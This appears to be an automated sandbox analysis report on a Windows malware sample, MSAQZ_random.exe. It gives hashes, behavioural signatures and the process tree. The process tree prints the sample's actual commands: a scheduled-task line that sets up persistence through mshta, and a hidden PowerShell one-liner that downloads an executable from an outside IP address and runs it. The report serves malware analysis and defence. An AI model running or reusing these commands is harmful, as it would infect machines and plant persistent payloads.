Analysis
-
max time kernel
73s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
29/03/2025, 13:38
Static task
static1
Behavioral task
behavioral1
Sample
MSAQZ_random.exe
Resource
win7-20241010-en
General
-
Target
MSAQZ_random.exe
-
Size
938KB
-
MD5
ed19338ae7b4f14a6300a82555194914
-
SHA1
c4b17e900215a704197817f8d419b40a07d687e8
-
SHA256
7b5bd878343c3cecaee575c5046401e677127e53682f1894067af020d3bab1fa
-
SHA512
64fc35627f5790aa025d05515e8b353ed7825f0cfaf975304933d33b219ccbf7e8e41f9f83152a0a8315568b5195dbbb669d446f6a58f5d3f3a9b9937d16ddca
-
SSDEEP
24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0hu:9TvC/MTQYxsWR7a0h
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2324 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2324 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSAQZ_random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1456 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2324 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1628 MSAQZ_random.exe 1628 MSAQZ_random.exe 1628 MSAQZ_random.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1628 MSAQZ_random.exe 1628 MSAQZ_random.exe 1628 MSAQZ_random.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1628 wrote to memory of 2364 1628 MSAQZ_random.exe 30 PID 1628 wrote to memory of 2364 1628 MSAQZ_random.exe 30 PID 1628 wrote to memory of 2364 1628 MSAQZ_random.exe 30 PID 1628 wrote to memory of 2364 1628 MSAQZ_random.exe 30 PID 1628 wrote to memory of 2596 1628 MSAQZ_random.exe 31 PID 1628 wrote to memory of 2596 1628 MSAQZ_random.exe 31 PID 1628 wrote to memory of 2596 1628 MSAQZ_random.exe 31 PID 1628 wrote to memory of 2596 1628 MSAQZ_random.exe 31 PID 2364 wrote to memory of 1456 2364 cmd.exe 33 PID 2364 wrote to memory of 1456 2364 cmd.exe 33 PID 2364 wrote to memory of 1456 2364 cmd.exe 33 PID 2364 wrote to memory of 1456 2364 cmd.exe 33 PID 2596 wrote to memory of 2324 2596 mshta.exe 34 PID 2596 wrote to memory of 2324 2596 mshta.exe 34 PID 2596 wrote to memory of 2324 2596 mshta.exe 34 PID 2596 wrote to memory of 2324 2596 mshta.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\MSAQZ_random.exe"C:\Users\Admin\AppData\Local\Temp\MSAQZ_random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn st4mImaPIq4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\N8b1aT3up.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn st4mImaPIq4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\N8b1aT3up.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1456
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\N8b1aT3up.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7UC2BHEMG9NGZTFOR1HYNOK4HD0ALLXK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD575bef32b6afa7c11da58aa50228b5c5c
SHA13934e7f7f9a1a63d2f4689e04ad2c010af08708c
SHA256d25fd05dba18c140d19edcce3d78e6d24aedd28cedccd9cf7a91224bfeed4bce
SHA51283e281236ec2c57f4633b10346fb94cc7252aacb889af01bd8c188d43e84a50dff3d44bdecf10ba2312ceb13f9fa937d4beda671e3616e9133f40b747fed39ab